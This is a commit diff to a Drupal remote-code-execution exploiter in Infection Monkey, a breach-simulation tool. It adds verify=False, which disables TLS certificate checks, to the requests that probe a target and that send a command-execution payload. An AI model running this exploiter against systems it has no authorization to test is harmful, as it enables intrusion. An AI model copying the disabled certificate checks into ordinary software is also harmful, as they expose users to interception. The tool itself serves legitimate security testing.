verify=False for HTTPS requests

2020-09-02 00:17:46 +03:00 · 2020-09-02 00:17:46 +03:00 · 702f5c1a41
parent eb4f50a0ca
commit 702f5c1a41
1 changed files with 7 additions and 3 deletions
--- a/monkey/infection_monkey/exploit/drupal.py
+++ b/monkey/infection_monkey/exploit/drupal.py
@ -75,7 +75,8 @@ class DrupalExploiter(WebRCE):

        response = requests.get(f'{url}?_format=hal_json',
                                json=payload,
-                                headers={"Content-Type": "application/hal+json"})
+                                headers={"Content-Type": "application/hal+json"},
+                                verify=False)

        if is_response_cached(response):
            LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring')
@ -89,8 +90,11 @@ class DrupalExploiter(WebRCE):
        base = remove_port(url)
        payload = build_cmd_execution_payload(base, cmd)

-        r = requests.get(f'{url}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"})
-
+        r = requests.get(f'{url}?_format=hal_json',
+                         json=payload,
+                         headers={"Content-Type": "application/hal+json"},
+                         verify=False)
+        
        if is_response_cached(r):
            LOG.info(f'Exploiting {url} returned cache HIT, may have failed')